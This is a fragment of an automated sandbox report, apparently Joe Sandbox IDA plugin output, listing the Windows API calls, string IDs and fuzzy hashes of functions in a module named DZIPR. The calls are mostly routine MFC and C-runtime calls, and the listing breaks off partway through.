                          Similarity
                          • API ID: Window$AtomCallGlobalProcProp$DeleteFindH_prolog3_catchLongRectRemove
                          • String ID: AfxOldWndProc423
                          • API String ID: 2109165785-1060338832
                          • Opcode ID: bdf508fa467d7cd31fe52451165c2545e00037e484ad536cf1a734e13b9a549d
                          • Instruction ID: e52d53027e43a564bfc0893936d9d83657bb940ba4a2504785cf68535b3d911a
                          • Opcode Fuzzy Hash: bdf508fa467d7cd31fe52451165c2545e00037e484ad536cf1a734e13b9a549d
                          • Instruction Fuzzy Hash: 48316D3A40021AAFCF119FA4CE59DFF7BB8EF06325F044115F611A2190DF7999A29BA1
                          APIs
                          • SetFilePointer.KERNEL32(?,?,?,00000000,?,?,?,?,?,6FA61BE9,?,?,?,?), ref: 6FA61C39
                          • GetLastError.KERNEL32(?,?,?,?,?,6FA61BE9,?,?,?,?), ref: 6FA61C48
                          • __aullrem.LIBCMT ref: 6FA61C60
                          • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,00000000), ref: 6FA61CE8
                          • _memset.LIBCMT ref: 6FA61CF5
                          • SetFilePointer.KERNEL32(?,?,00000000,00000001,?,?,?,?,6FA61BE9,?,?,?,?), ref: 6FA61D07
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: File$Pointer$ErrorLastRead__aullrem_memset
                          • String ID:
                          • API String ID: 123228641-0
                          • Opcode ID: 3498bd255d6a33ca362fda2125bfe80bbb51948b4889af4c00c87a6683fedf0b
                          • Instruction ID: 3ade2afa22df9f5bc3ddaf9d1a6ca2fb2115b06c523491cf58973b18358e665e
                          • Opcode Fuzzy Hash: 3498bd255d6a33ca362fda2125bfe80bbb51948b4889af4c00c87a6683fedf0b
                          • Instruction Fuzzy Hash: C1515F71604701AFD750DF29C840BABBBE8EF89B64F044929F968D7240E774E9458BA2
                          APIs
                          • __EH_prolog3_catch.LIBCMT ref: 6FA6BE14
                          • EnterCriticalSection.KERNEL32(?,00000010,6FA6C0D0,?,00000000,?,00000004,6FA6AF00,6FA66DDD,6FA6A591,6FA62BC2,?,?,?,?,?), ref: 6FA6BE25
                          • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,6FA6AF00,6FA66DDD,6FA6A591,6FA62BC2,?,?,?,?,?), ref: 6FA6BE43
                          • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,6FA6AF00,6FA66DDD,6FA6A591,6FA62BC2,?,?,?), ref: 6FA6BE77
                          • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,6FA6AF00,6FA66DDD,6FA6A591,6FA62BC2,?,?,?,?,?), ref: 6FA6BEE3
                          • _memset.LIBCMT ref: 6FA6BF02
                          • TlsSetValue.KERNEL32(?,00000000,?), ref: 6FA6BF13
                          • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,6FA6AF00,6FA66DDD,6FA6A591,6FA62BC2,?,?,?,?,?), ref: 6FA6BF34
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                          • String ID:
                          • API String ID: 1891723912-0
                          • Opcode ID: 23c141859d66eb92c956fdd58e3e42b0ba9dd2c930716e6d20ef7d40c853a20e
                          • Instruction ID: 7ad4772caa4f8789996b611f51fea50a04ae226f287e73f123527ac80d0f71ed
                          • Opcode Fuzzy Hash: 23c141859d66eb92c956fdd58e3e42b0ba9dd2c930716e6d20ef7d40c853a20e
                          • Instruction Fuzzy Hash: 6731AF74404B05EFDB24EF64C984C5ABBB1FF05364B10C62AF6259B6A0CB78E990CF90
                          APIs
                            • Part of subcall function 6FA6815A: GetParent.USER32(?), ref: 6FA681AE
                            • Part of subcall function 6FA6815A: GetLastActivePopup.USER32(?), ref: 6FA681BF
                            • Part of subcall function 6FA6815A: IsWindowEnabled.USER32(?), ref: 6FA681D3
                            • Part of subcall function 6FA6815A: EnableWindow.USER32(?,00000000), ref: 6FA681E6
                          • EnableWindow.USER32(?,00000001), ref: 6FA68247
                          • GetWindowThreadProcessId.USER32(?,?), ref: 6FA6825B
                          • GetCurrentProcessId.KERNEL32(?,?), ref: 6FA68265
                          • SendMessageW.USER32(?,00000376,00000000,00000000), ref: 6FA6827D
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 6FA682F9
                          • EnableWindow.USER32(00000000,00000001), ref: 6FA68340
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                          • String ID: 0
                          • API String ID: 1877664794-4108050209
                          • Opcode ID: 909fbb61be2d902178fe300e7bbbbb58d333cfdfc69820436771fc301a05f6f9
                          • Instruction ID: 42ee659c458a2a234fd399f4b2261da3122ac130687f6c520c61c9aa5bc071ad
                          • Opcode Fuzzy Hash: 909fbb61be2d902178fe300e7bbbbb58d333cfdfc69820436771fc301a05f6f9
                          • Instruction Fuzzy Hash: AB418371A44B189BDB208F74CD88BDA77B8FF06714F180599E925E6280DB74EAD18B90
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 6FA6DED6
                          • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 6FA6DF00
                          • GetSystemMetrics.USER32(00000000), ref: 6FA6DF17
                          • GetSystemMetrics.USER32(00000001), ref: 6FA6DF1E
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,DISPLAY,000000FF,-00000028,00000020), ref: 6FA6DF49
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: System$ByteCharMetricsMultiWide$InfoParameters
                          • String ID: B$DISPLAY
                          • API String ID: 381819527-3316187204
                          • Opcode ID: 6af9da30cca5e9bd440ded143a2a56993a99fe819db9def4b48adb99ff14a4fd
                          • Instruction ID: f26fe9e3939902071d2cb1c9e92ec2c9a0fe0b8b52a010dca9e23fff159ec159
                          • Opcode Fuzzy Hash: 6af9da30cca5e9bd440ded143a2a56993a99fe819db9def4b48adb99ff14a4fd
                          • Instruction Fuzzy Hash: A121DD71504720AFDF108F14CD44B577BAAEF46BA0F258526FD289B185DAB4D481CBB1
                          APIs
                          • GlobalLock.KERNEL32(?), ref: 6FA688E7
                          • lstrcmpW.KERNEL32(00000000,?), ref: 6FA688F4
                          • OpenPrinterW.WINSPOOL.DRV(?,?,00000000), ref: 6FA68906
                          • DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6FA68926
                          • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6FA6892E
                          • GlobalLock.KERNEL32(00000000), ref: 6FA68938
                          • DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 6FA68945
                          • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 6FA6895D
                            • Part of subcall function 6FA6DAD1: GlobalFlags.KERNEL32(?), ref: 6FA6DAE0
                            • Part of subcall function 6FA6DAD1: GlobalUnlock.KERNEL32(?), ref: 6FA6DAF2
                            • Part of subcall function 6FA6DAD1: GlobalFree.KERNEL32(?), ref: 6FA6DAFD
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                          • String ID:
                          • API String ID: 168474834-0
                          • Opcode ID: 8b50b85ac546caecded5d3a563bc04c9151fe962270c52518a2f8689640c2a18
                          • Instruction ID: 5d3ffe91aea7df60e767de57b5d6d05e6cb8bb7d3f8839a4b52b78af2f4bc5e1
                          • Opcode Fuzzy Hash: 8b50b85ac546caecded5d3a563bc04c9151fe962270c52518a2f8689640c2a18
                          • Instruction Fuzzy Hash: E511EF76404A04BFDB115BA5CD48CAF7BBDFF86B147004019FA21E2020DB78D981D720
                          APIs
                          • GetSystemMetrics.USER32(0000000B), ref: 6FA6CD75
                          • GetSystemMetrics.USER32(0000000C), ref: 6FA6CD7C
                          • GetSystemMetrics.USER32(00000002), ref: 6FA6CD83
                          • GetSystemMetrics.USER32(00000003), ref: 6FA6CD8D
                          • GetDC.USER32(00000000), ref: 6FA6CD97
                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 6FA6CDA8
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 6FA6CDB0
                          • ReleaseDC.USER32(00000000,00000000), ref: 6FA6CDB8
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: MetricsSystem$CapsDevice$Release
                          • String ID:
                          • API String ID: 1151147025-0
                          • Opcode ID: 63b4eb3c72ad7c2f6e3cc0020562e61986cf4870f161dcdd78f477e20993e2f2
                          • Instruction ID: 0ace4845f898848331ca96859b5f065bdaac3e3963769767e926d289e76c2b77
                          • Opcode Fuzzy Hash: 63b4eb3c72ad7c2f6e3cc0020562e61986cf4870f161dcdd78f477e20993e2f2
                          • Instruction Fuzzy Hash: BFF06DB1E40B14BAEB105B728C49F167F68EB46731F008526E6189B2C0CAB698228FD0
                          APIs
                          • _memset.LIBCMT ref: 6FA7029B
                          • SendMessageW.USER32(00000000,00000433,00000000,?), ref: 6FA702C4
                          • GetWindowLongW.USER32(?,000000FC), ref: 6FA702D6
                          • GetWindowLongW.USER32(?,000000FC), ref: 6FA702E7
                          • SetWindowLongW.USER32(?,000000FC,?), ref: 6FA70303
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: LongWindow$MessageSend_memset
                          • String ID: ,
                          • API String ID: 2997958587-3772416878
                          • Opcode ID: 5b9b211d0fe9eff7a6e942a2477057f1bfdecaf5132e443d126b3ff3ea9ffeed
                          • Instruction ID: 58044ca62bc2ba832ca1523e1f423969984c3c2ab7aee0ebb6e02d31cbe8cceb
                          • Opcode Fuzzy Hash: 5b9b211d0fe9eff7a6e942a2477057f1bfdecaf5132e443d126b3ff3ea9ffeed
                          • Instruction Fuzzy Hash: 2A31E0762007109FDB209FB4C884E5ABBB5BF49314F155629E2559B690DF3AF880CB94
                          APIs
                          • __EH_prolog3_GS.LIBCMT ref: 6FA6A20A
                          • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 6FA6A2F0
                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 6FA6A30D
                          • RegCloseKey.ADVAPI32(?), ref: 6FA6A32D
                          • RegQueryValueW.ADVAPI32(80000001,?,?,?), ref: 6FA6A348
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: CloseEnumH_prolog3_OpenQueryValue
                          • String ID: Software\
                          • API String ID: 1666054129-964853688
                          • Opcode ID: 5ea632f39f051c331bf541b66d54065b0b2c7b1ceddb21f9819d1b67cee23fa1
                          • Instruction ID: 69bc3964879551c4ef73c385641af51493a0b6db1d43ca44f3147598162bc819
                          • Opcode Fuzzy Hash: 5ea632f39f051c331bf541b66d54065b0b2c7b1ceddb21f9819d1b67cee23fa1
                          • Instruction Fuzzy Hash: 25418431901628ABCF21EBA4DD88EDEB7B9AF49314F1406D5E119E2290DB789FC5CF50
                          APIs
                          • __EH_prolog3_catch_GS.LIBCMT ref: 6FA6A08C
                          • RegOpenKeyW.ADVAPI32(?,?,?), ref: 6FA6A11A
                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 6FA6A13D
                            • Part of subcall function 6FA6A02D: __EH_prolog3.LIBCMT ref: 6FA6A034
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: EnumH_prolog3H_prolog3_catch_Open
                          • String ID: Software\Classes\
                          • API String ID: 3518408925-1121929649
                          • Opcode ID: 3c4b9c626cb1f19e95423153d8a49b30c7078c9d56d14a69f1a2b1d5927f901e
                          • Instruction ID: b0d2b28baab0cb54ab18215c5f8ac7b04b5972791b91f8d42a9a7c29487cbbc6
                          • Opcode Fuzzy Hash: 3c4b9c626cb1f19e95423153d8a49b30c7078c9d56d14a69f1a2b1d5927f901e
                          • Instruction Fuzzy Hash: AD31A135C04238ABCB21ABA4DD48BDDBBB5AF09324F1402D5E869A7290CB785FC4DF50
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 6FA6D0AE
                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6FA6D0D1
                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6FA6D0ED
                          • RegCloseKey.ADVAPI32(?), ref: 6FA6D0FD
                          • RegCloseKey.ADVAPI32(?), ref: 6FA6D107
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: CloseCreate$Open
                          • String ID: software
                          • API String ID: 1740278721-2010147023
                          • Opcode ID: ba6de1a4fa5386a552077766ea23a832013c2c6023c66610913434ee009cc799
                          • Instruction ID: acc2f81aec668325abb9b84b4b8a7ef79ce4cf7099f6a9571c71a2868de50e54
                          • Opcode Fuzzy Hash: ba6de1a4fa5386a552077766ea23a832013c2c6023c66610913434ee009cc799
                          • Instruction Fuzzy Hash: D2112872D00118FB8B21DB8ACD88CDFBFBDEFCA750B2040AAF515A2111D7709A51DBA0
                          APIs
                          • LeaveCriticalSection.KERNEL32(?), ref: 6FA6BEB5
                          • __CxxThrowException@8.LIBCMT ref: 6FA6BEBF
                            • Part of subcall function 6FA7527B: RaiseException.KERNEL32(?,00000003,000000FF,6FA6279F), ref: 6FA752BD
                          • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,6FA6AF00,6FA66DDD,6FA6A591,6FA62BC2,?), ref: 6FA6BED6
                          • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,6FA6AF00,6FA66DDD,6FA6A591,6FA62BC2,?,?,?,?,?), ref: 6FA6BEE3
                            • Part of subcall function 6FA66D89: __CxxThrowException@8.LIBCMT ref: 6FA66D9F
                          • _memset.LIBCMT ref: 6FA6BF02
                          • TlsSetValue.KERNEL32(?,00000000,?), ref: 6FA6BF13
                          • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,6FA6AF00,6FA66DDD,6FA6A591,6FA62BC2,?,?,?,?,?), ref: 6FA6BF34
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                          • String ID:
                          • API String ID: 356813703-0
                          • Opcode ID: 07c79af0b2ab859f63da748c58ab34d84566140f252f0e13989d10bcf35ba4e4
                          • Instruction ID: fba405c979032665f6af1d5688ea5f5f0d77c0fb823431728438884966406ce4
                          • Opcode Fuzzy Hash: 07c79af0b2ab859f63da748c58ab34d84566140f252f0e13989d10bcf35ba4e4
                          • Instruction Fuzzy Hash: 89115E74100B05AFDB20AF64CD85C2ABBB5FF06364750C529F66596664CF35ECA1CF90
                          APIs
                          • SetErrorMode.KERNEL32(00000000), ref: 6FA6CA85
                          • SetErrorMode.KERNEL32(00000000), ref: 6FA6CA8D
                            • Part of subcall function 6FA6A698: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6FA6A6D0
                            • Part of subcall function 6FA6A698: SetLastError.KERNEL32(0000006F), ref: 6FA6A6E7
                          • GetModuleHandleW.KERNEL32(user32.dll), ref: 6FA6CADC
                          • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 6FA6CAEC
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: Error$ModeModule$AddressFileHandleLastNameProc
                          • String ID: NotifyWinEvent$user32.dll
                          • API String ID: 1146408833-597752486
                          • Opcode ID: 65f9e3198b3d21eb8cbbcd1b6d7abfac9986ec5afe92e1e057d1d69dd1241987
                          • Instruction ID: a10495e0b38b4429750039214006e90cce38acf5e26e867b50c1134f8e83a293
                          • Opcode Fuzzy Hash: 65f9e3198b3d21eb8cbbcd1b6d7abfac9986ec5afe92e1e057d1d69dd1241987
                          • Instruction Fuzzy Hash: A101DF709143244FCB10EFA48A08A5A3FA9AF49B20B05805AF928DB380DF78D880CF61
                          APIs
                          • GetSysColor.USER32(0000000F), ref: 6FA6CD2E
                          • GetSysColor.USER32(00000010), ref: 6FA6CD35
                          • GetSysColor.USER32(00000014), ref: 6FA6CD3C
                          • GetSysColor.USER32(00000012), ref: 6FA6CD43
                          • GetSysColor.USER32(00000006), ref: 6FA6CD4A
                          • GetSysColorBrush.USER32(0000000F), ref: 6FA6CD57
                          • GetSysColorBrush.USER32(00000006), ref: 6FA6CD5E
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: Color$Brush
                          • String ID:
                          • API String ID: 2798902688-0
                          • Opcode ID: d0ec29eb1ae91e47db3e773fc57b1d2a3b9c478a37aece47d29758377edcf5ae
                          • Instruction ID: 58dc72ec106ab683f564322e570120629bf18bc56eea93bf7850b49fdc9144d3
                          • Opcode Fuzzy Hash: d0ec29eb1ae91e47db3e773fc57b1d2a3b9c478a37aece47d29758377edcf5ae
                          • Instruction Fuzzy Hash: EAF012719407445BDB30BF724D09B47BAD1FFC5720F16092EE2458BA90DAB6E451DF40
                          APIs
                          • GetWindowLongW.USER32(?,000000F0), ref: 6FA6818D
                          • GetParent.USER32(?), ref: 6FA6819B
                          • GetParent.USER32(?), ref: 6FA681AE
                          • GetLastActivePopup.USER32(?), ref: 6FA681BF
                          • IsWindowEnabled.USER32(?), ref: 6FA681D3
                          • EnableWindow.USER32(?,00000000), ref: 6FA681E6
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                          • String ID:
                          • API String ID: 670545878-0
                          • Opcode ID: 496fcfa551cbf94e996c2f8c1f652a0dfbb32951869d54537a1e116f68a277c9
                          • Instruction ID: c8af1edd5851168ee8ae2eb931bbcdf678a8dd0c10ad9f5b4fad27faf8538d01
                          • Opcode Fuzzy Hash: 496fcfa551cbf94e996c2f8c1f652a0dfbb32951869d54537a1e116f68a277c9
                          • Instruction Fuzzy Hash: 3011067260DB20ABD7120A698D44B9A73ACAF47F60F0D4112FC24EB240CB6CE9C2C7D1
                          APIs
                          • __CreateFrameInfo.LIBCMT ref: 6FA7C43E
                            • Part of subcall function 6FA74FC4: __getptd.LIBCMT ref: 6FA74FD2
                            • Part of subcall function 6FA74FC4: __getptd.LIBCMT ref: 6FA74FE0
                          • __getptd.LIBCMT ref: 6FA7C448
                            • Part of subcall function 6FA7A27F: __getptd_noexit.LIBCMT ref: 6FA7A282
                            • Part of subcall function 6FA7A27F: __amsg_exit.LIBCMT ref: 6FA7A28F
                          • __getptd.LIBCMT ref: 6FA7C456
                          • __getptd.LIBCMT ref: 6FA7C464
                          • __getptd.LIBCMT ref: 6FA7C46F
                          • _CallCatchBlock2.LIBCMT ref: 6FA7C495
